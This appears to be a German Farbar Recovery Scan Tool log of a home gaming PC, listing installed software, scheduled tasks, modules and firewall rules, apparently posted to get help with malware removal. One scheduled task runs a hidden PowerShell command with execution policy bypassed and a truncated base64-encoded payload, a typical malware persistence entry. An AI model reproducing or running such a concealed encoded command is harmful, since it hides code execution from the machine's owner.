Jet Set Radio (HKLM-x32\...\Steam App 205950) (Version:  - Blit Software)
Legend of Grimrock (HKLM-x32\...\Steam App 207170) (Version:  - Almost Human Games)
LEGO® Star Wars™: The Complete Saga (HKLM-x32\...\Steam App 32440) (Version:  - Traveller's Tales)
Machinarium (HKLM-x32\...\Steam App 40700) (Version:  - Amanita Design)
Malwarebytes Anti-Malware Version 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes)
Mark of the Ninja (HKLM-x32\...\Steam App 214560) (Version:  - Klei Entertainment)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 (HKLM-x32\...\{e46eca4f-393b-40df-9f49-076faf788d83}) (Version: 14.0.23026.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Mount Your Friends (HKLM-x32\...\Steam App 296470) (Version:  - Stegersaurus Software Inc.)
Mozilla Firefox 44.0.2 (x86 de) (HKLM-x32\...\Mozilla Firefox 44.0.2 (x86 de)) (Version: 44.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 44.0.2.5884 - Mozilla)
MusicBee 2.5 (HKLM-x32\...\MusicBee) (Version: 2.5 - Steven Mayall)
My Game Long Name (HKLM\...\UDK-e526e0d9-5eb7-4e51-9691-3447cc1f95dd) (Version:  - Epic Games, Inc.)
Nuclear Throne (HKLM-x32\...\Steam App 242680) (Version:  - Vlambeer)
NVIDIA 3D Vision Controller-Treiber 352.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 352.65 - NVIDIA Corporation)
NVIDIA 3D Vision Treiber 361.43 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 361.43 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.9.1.22 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.9.1.22 - NVIDIA Corporation)
NVIDIA Grafiktreiber 361.43 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 361.43 - NVIDIA Corporation)
NVIDIA HD-Audiotreiber 1.3.34.4 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.4 - NVIDIA Corporation)
NVIDIA PhysX v8.09.04 (HKLM-x32\...\{A7E07C2B-2220-4415-87E3-784D5814BC93}) (Version: 8.09.04 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.15.0428 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.15.0428 - NVIDIA Corporation)
Outlast (HKLM-x32\...\Steam App 238320) (Version:  - Red Barrels)
Painkiller: Black Edition (HKLM-x32\...\Steam App 39530) (Version:  - People Can Fly)
Patch testing for Chivalry (HKLM-x32\...\Steam App 232210) (Version:  - )
Project64 1.6 (HKLM-x32\...\{9559F7CA-5E34-4237-A2D9-D856464AD727}) (Version: 1.6 - Project64)
Psychonauts (HKLM-x32\...\Steam App 3830) (Version:  - Double Fine Productions)
Rayman Legends (HKLM-x32\...\Steam App 242550) (Version:  - )
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7541 - Realtek Semiconductor Corp.)
Revo Uninstaller 1.95 (HKLM-x32\...\Revo Uninstaller) (Version: 1.95 - VS Revo Group)
Risk of Rain (HKLM-x32\...\Steam App 248820) (Version:  - )
Rocket League (HKLM-x32\...\Steam App 252950) (Version:  - Psyonix)
Rogue Legacy (HKLM-x32\...\Steam App 241600) (Version:  - Cellar Door Games)
SEGA Genesis & Mega Drive Classics (HKLM-x32\...\Steam App 34270) (Version:  - Sega)
Serious Sam 2 (HKLM-x32\...\Steam App 204340) (Version:  - Croteam)
Shadow Warrior (HKLM-x32\...\Steam App 233130) (Version:  - Flying Wild Hog)
Shantae and the Pirate's Curse (HKLM-x32\...\Steam App 345820) (Version:  - WayForward)
SHIELD Streaming (Version: 4.1.0260 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 2.9.1.22 - NVIDIA Corporation) Hidden
Slender: The Arrival (HKLM-x32\...\Steam App 252330) (Version:  - Blue Isle Studios)
SOMA (HKLM-x32\...\Steam App 282140) (Version:  - Frictional Games)
Sonic & All-Stars Racing Transformed (HKLM-x32\...\Steam App 212480) (Version:  - Sumo Digital)
Spelunky (HKLM-x32\...\Steam App 239350) (Version:  - )
Spotify (HKU\S-1-5-21-15253450-2137153623-3730132983-1001\...\Spotify) (Version: 1.0.21.143.g76c19bcd - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Street Fighter V Beta (HKLM-x32\...\Steam App 386800) (Version:  - )
TechPowerUp GPU-Z (HKLM-x32\...\TechPowerUp GPU-Z) (Version:  - TechPowerUp)
The Binding of Isaac: Rebirth (HKLM-x32\...\Steam App 250900) (Version:  - Nicalis, Inc.)
The Elder Scrolls V: Skyrim (HKLM-x32\...\Steam App 72850) (Version:  - Bethesda Game Studios)
The Witcher 2: Assassins of Kings Enhanced Edition (HKLM-x32\...\Steam App 20920) (Version:  - CD PROJEKT RED)
TowerFall Ascension (HKLM-x32\...\Steam App 251470) (Version:  - Matt Thorson)
Ultra Street Fighter IV (HKLM-x32\...\Steam App 45760) (Version:  - Capcom)
Uplay (HKLM-x32\...\Uplay) (Version: 15.0 - Ubisoft)
Viscera Cleanup Detail: Shadow Warrior (HKLM-x32\...\Steam App 255520) (Version:  - RuneStorm)
VLC media player (HKLM\...\VLC media player) (Version: 2.2.1 - VideoLAN)
Volgarr the Viking (HKLM-x32\...\Steam App 247240) (Version:  - Crazy Viking Studios)
WinRAR 5.30 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.30.0 - win.rar GmbH)
Ys: The Oath in Felghana (HKLM-x32\...\Steam App 207320) (Version:  - Nihon Falcom)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-15253450-2137153623-3730132983-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Hanns\AppData\Local\Microsoft\OneDrive\17.3.6301.0127\FileCoAuth.exe (Microsoft Corporation)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {0CAF213C-4D87-4FED-8BD2-6815E673A493} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\Windows\system32\MRT.exe [2016-02-09] (Microsoft Corporation)
Task: {32BB50D9-B58C-4E57-8200-D3D01A45A033} - System32\Tasks\{79057847-0F05-080F-0B11-0D0D7F09117E} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (Der Dateneintrag hat 9420 mehr Zeichen).
Task: {34C7A01A-1E96-4BAC-82BB-C8752D512355} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-02-09] (Adobe Systems Incorporated)
Task: {4782D62F-44F9-4AD2-8143-138D695AA8C8} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-02-01] (Google Inc.)
Task: {9117BB17-5F10-4BFE-8A24-FCA564C04F49} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-02-01] (Google Inc.)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2015-10-30 08:18 - 2015-10-30 08:18 - 00185856 _____ () C:\Windows\SYSTEM32\ism32k.dll
2015-12-21 22:42 - 2015-12-16 15:54 - 00126256 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2015-05-19 09:11 - 2015-05-19 09:11 - 00007680 _____ () C:\Program Files (x86)\Intel\Intel(R) Security Assist\isaHelperService.exe
2015-12-21 22:45 - 2016-01-12 05:43 - 00291264 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamBase.dll
2015-12-16 20:57 - 2015-11-22 11:47 - 02653816 _____ () C:\Windows\system32\CoreUIComponents.dll
2015-12-16 20:57 - 2015-11-22 11:47 - 02653816 _____ () C:\Windows\System32\CoreUIComponents.dll
2015-12-17 22:23 - 2015-12-07 05:14 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2015-12-17 22:23 - 2015-12-07 05:00 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2016-01-13 12:46 - 2016-01-05 02:29 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-01-13 12:46 - 2016-01-05 02:23 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-01-27 20:34 - 2016-01-16 06:10 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-01-27 20:34 - 2016-01-16 06:13 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-02-10 23:01 - 2016-02-09 05:04 - 02048840 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.109\libglesv2.dll
2016-02-10 23:01 - 2016-02-09 05:04 - 00100168 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.109\libegl.dll
2016-02-10 23:01 - 2016-02-09 05:04 - 29269832 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.109\PepperFlash\pepflashplayer.dll
2015-12-21 22:45 - 2016-01-12 05:43 - 00018880 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2015-12-16 21:37 - 2015-12-15 06:54 - 00782336 _____ () C:\Program Files (x86)\Steam\SDL2.dll
2015-12-16 21:37 - 2015-07-03 17:12 - 04962816 _____ () C:\Program Files (x86)\Steam\v8.dll
2015-12-16 21:37 - 2016-02-04 22:02 - 02546768 _____ () C:\Program Files (x86)\Steam\video.dll
2015-12-16 21:37 - 2015-09-24 01:33 - 02549248 _____ () C:\Program Files (x86)\Steam\libavcodec-56.dll
2015-12-16 21:37 - 2015-09-24 01:33 - 00491008 _____ () C:\Program Files (x86)\Steam\libavformat-56.dll
2015-12-16 21:37 - 2015-09-24 01:33 - 00332800 _____ () C:\Program Files (x86)\Steam\libavresample-2.dll
2015-12-16 21:37 - 2015-09-24 01:33 - 00442880 _____ () C:\Program Files (x86)\Steam\libavutil-54.dll
2015-12-16 21:37 - 2015-09-24 01:33 - 00485888 _____ () C:\Program Files (x86)\Steam\libswscale-3.dll
2015-12-16 21:37 - 2015-07-03 17:12 - 01556992 _____ () C:\Program Files (x86)\Steam\icui18n.dll
2015-12-16 21:37 - 2015-07-03 17:12 - 01187840 _____ () C:\Program Files (x86)\Steam\icuuc.dll
2015-12-16 21:37 - 2016-02-04 22:01 - 00802896 _____ () C:\Program Files (x86)\Steam\bin\chromehtml.DLL
2015-12-16 21:37 - 2015-12-30 02:51 - 00208896 _____ () C:\Program Files (x86)\Steam\bin\openvr_api.dll
2015-12-16 21:37 - 2016-01-06 02:52 - 48387872 _____ () C:\Program Files (x86)\Steam\bin\libcef.dll
2015-07-10 23:37 - 2015-07-10 23:37 - 01243936 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)


==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)


==================== EXE Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)


==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2015-10-30 08:24 - 2015-10-30 08:21 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-15253450-2137153623-3730132983-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Hanns\AppData\Roaming\Mozilla\Firefox\Desktop-Hintergrund.bmp
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)


==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{1EAC473C-FA1C-426F-BF4C-9AD7909569CE}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{803578E2-7173-472C-8E3C-795421980732}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{5160117B-5987-49C9-AC37-3ADEFB5C48FB}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{18669D97-94B1-4B7F-A7A7-40D2F00024E6}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{D279C9BA-565A-43E3-AA61-DB5699B3C0D2}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{E18D7105-2D33-45DD-82B0-18C2AF5B52A0}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{7E4274BA-9780-4575-9786-395A420E28BE}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Dark Souls Prepare to Die Edition\DATA\DARKSOULS.exe
FirewallRules: [{9937E168-7F72-4592-AC78-402FC3683293}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Dark Souls Prepare to Die Edition\DATA\DARKSOULS.exe
FirewallRules: [{257ECA36-9B8D-4B31-9B80-26EBABA8B789}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Sonic & All-Stars Racing Transformed\ASN_App_PcDx9_Final.exe
FirewallRules: [{7872B1CC-A122-43DD-AB25-EA689B55BF3A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Sonic & All-Stars Racing Transformed\ASN_App_PcDx9_Final.exe
FirewallRules: [{46A9139D-EE95-4484-B24C-72B9CF034F13}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Sonic & All-Stars Racing Transformed\Launcher.exe
FirewallRules: [{5F8B7434-C958-4905-B228-FE1A81F6ECC8}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Sonic & All-Stars Racing Transformed\Launcher.exe
FirewallRules: [{B4B45D77-D23E-438C-89BE-B51B4C0DD436}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Ys The Oath in Felghana\ysf_win_dx9.exe
FirewallRules: [{70A635E4-4D59-4BFC-9686-33AA74D6EE3E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Ys The Oath in Felghana\ysf_win_dx9.exe
FirewallRules: [{1691828A-7230-414D-9A2B-96A9176E98B3}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Ys The Oath in Felghana\config_dx9.exe
FirewallRules: [{A161CD64-C8FC-4C27-A664-4D5DD65A14AF}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Ys The Oath in Felghana\config_dx9.exe
FirewallRules: [{982B0E6B-F295-473E-BB62-74B293CFC41E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Ys The Oath in Felghana\ysf_win.exe
FirewallRules: [{506CFF18-5D3E-4F51-B818-61121AAFDE87}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Ys The Oath in Felghana\ysf_win.exe
FirewallRules: [{EE725E3F-DBBA-4A2F-80A2-2CB834FEEE50}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Ys The Oath in Felghana\config.exe
FirewallRules: [{CF9D7347-1C1A-4711-97D5-92381DEE8E85}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Ys The Oath in Felghana\config.exe
FirewallRules: [{F2062B12-8D24-47F3-AEF9-18A095CFB167}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Rogue Legacy\RogueLegacy.exe
FirewallRules: [{290FBBF5-15D4-4144-A6A5-4A39BD1CB108}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Rogue Legacy\RogueLegacy.exe
FirewallRules: [{A8315A1C-984C-4B9E-8622-2A3703B0A2BF}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Psychonauts\Psychonauts.exe
FirewallRules: [{FF8B00AB-E516-460F-88C4-FD1C932B0C9C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Psychonauts\Psychonauts.exe
FirewallRules: [{DD708F10-099E-48F1-8D91-7EA16BDCD204}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Super Street Fighter IV - Arcade Edition\SSFIV.exe
FirewallRules: [{5D48DAA4-77C9-458B-8385-83A900D778C1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Super Street Fighter IV - Arcade Edition\SSFIV.exe
FirewallRules: [{0E7C3D47-9652-495E-9012-3D9B943DAE20}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Shantae and the Pirate's Curse\ShantaeCurse.exe
FirewallRules: [{D807ED96-9674-405B-9178-2318ED5D9179}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Shantae and the Pirate's Curse\ShantaeCurse.exe
FirewallRules: [{805DE47A-E42A-48C2-9BAD-F4E1452F3AF9}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Spelunky\Spelunky.exe
FirewallRules: [{EDE5355E-3A91-4C12-9F8C-D30A6376D16F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Spelunky\Spelunky.exe
FirewallRules: [{E0B46C94-26AE-416E-8E8F-72795DD4BF7C}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{D60F6E29-44B1-4DC9-97BC-B23DB52EAC31}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{99E37BF6-B623-475E-903F-F9C18C402273}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{EAA71475-41CD-4245-9F8C-8D75FAFBA2CB}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{6684695F-D8F7-40DA-BABC-BAA9ECD0FA21}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{25293322-9D21-4807-9474-5AC9D524CC2A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{EAB18391-1B99-43E7-A624-A155122A6243}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{478BF737-6D3D-444C-AFF8-8ACB567BA386}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\DrinkBox_Game4\Game.exe
FirewallRules: [{B0316446-E2B3-4023-90A4-9C913ECEF809}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\DrinkBox_Game4\Game.exe
FirewallRules: [{B6AED1C1-2ECF-4221-940E-7E43EE4F6289}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Legend of Grimrock\grimrock.exe
FirewallRules: [{FF0ADBD9-F73A-4D25-B8F4-57BC0F59CE49}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Legend of Grimrock\grimrock.exe
FirewallRules: [{4AAC31BB-AE24-4B62-B064-7E84922580FC}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Nuclear Throne\nuclearthrone.exe
FirewallRules: [{20C6F0FB-7F37-47EF-9257-95C87D81E3E3}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Nuclear Throne\nuclearthrone.exe
FirewallRules: [{8D62E2AC-1CF4-4630-B7F6-5EAB1308B507}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Risk of Rain\Risk of Rain.exe
FirewallRules: [{0F7E170C-7FB4-40AB-8C5E-BBF29D23F042}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Risk of Rain\Risk of Rain.exe
FirewallRules: [{0CE63CE1-90DD-43C2-B8CF-EA2D677523B5}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Dark Souls II Scholar of the First Sin\Game\DarkSoulsII.exe
FirewallRules: [{B0A95B04-B7CF-4A8A-B0F3-3F3D5162C17A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Dark Souls II Scholar of the First Sin\Game\DarkSoulsII.exe
FirewallRules: [{6CAEB51F-21B5-48BF-979D-06BBA4DEF07D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Skyrim\SkyrimLauncher.exe
FirewallRules: [{57D5B383-DFB1-48D6-8441-B65CFA108F23}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Skyrim\SkyrimLauncher.exe
FirewallRules: [{9FBBB253-DF80-4DC0-A142-528F24610303}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Serious Sam 2\Bin\Sam2.exe
FirewallRules: [{ADF3B96F-78D2-4F33-9399-B32843827D36}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Serious Sam 2\Bin\Sam2.exe
FirewallRules: [{84B65B46-BF39-4D4E-A34E-439951CCF71C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\mark_of_the_ninja\bin\game.exe
FirewallRules: [{4F2D3197-EDA1-4AC7-8A67-C1E46D5E9587}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\mark_of_the_ninja\bin\game.exe
FirewallRules: [{00EBE37B-BD76-424D-AD77-92F18698F1F6}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Volgarr\Volgarr.exe
FirewallRules: [{8A9C04CA-9DFF-45E7-9DCC-A5FE4401EB83}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Volgarr\Volgarr.exe
FirewallRules: [{127DBEC5-737E-4E8C-BC9B-3ABD75CF8B96}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{192A8CFD-6765-412E-AD7B-AC3E1D140A5E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{2927A427-5D16-4590-9E1D-C1539535ADE4}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Machinarium\machinarium.exe
FirewallRules: [{920E24AA-B09E-4601-BF0C-AC4AF32D4C4A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Machinarium\machinarium.exe
FirewallRules: [TCP Query User{F2655CC9-7E76-4CC5-B393-506892F115AF}C:\users\hanns\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\hanns\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{426B7B55-D2B0-4452-8325-9597BA91446F}C:\users\hanns\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\hanns\appdata\roaming\spotify\spotify.exe
FirewallRules: [{342FB7C4-2925-43EF-AB67-F37599A91051}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\chivalrymedievalwarfarebeta\Binaries\Win64\CMW.exe
FirewallRules: [{BFEB411E-ABE3-4542-B2DC-E029F9140093}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\chivalrymedievalwarfarebeta\Binaries\Win64\CMW.exe
FirewallRules: [{14EAA340-3C9F-4E93-B7DD-0C047AF4867F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\chivalrymedievalwarfarebeta\Binaries\Win32\CMW.exe
FirewallRules: [{CFEDE40F-1AA8-4807-939F-41042FFB4D27}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\chivalrymedievalwarfarebeta\Binaries\Win32\CMW.exe
FirewallRules: [{8FB0C75B-D040-44C6-86CB-4A613BF879C5}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\chivalrymedievalwarfarebeta\ChivLauncher.exe
FirewallRules: [{4B9BA1BB-6123-4D2C-A11A-384CE786E33D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\chivalrymedievalwarfarebeta\ChivLauncher.exe
FirewallRules: [{D9ACFBBC-12E9-4DE0-B2ED-3C719B332E72}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\BioShock Infinite\Binaries\Win32\BioShockInfinite.exe
FirewallRules: [{D12B63F9-4E74-4C48-BCD2-7E4591BBFB52}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\BioShock Infinite\Binaries\Win32\BioShockInfinite.exe
FirewallRules: [{17711669-CD6D-40E5-ACD1-8EC9FCE6D06D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\chivalrymedievalwarfare\Binaries\Win64\CMW.exe
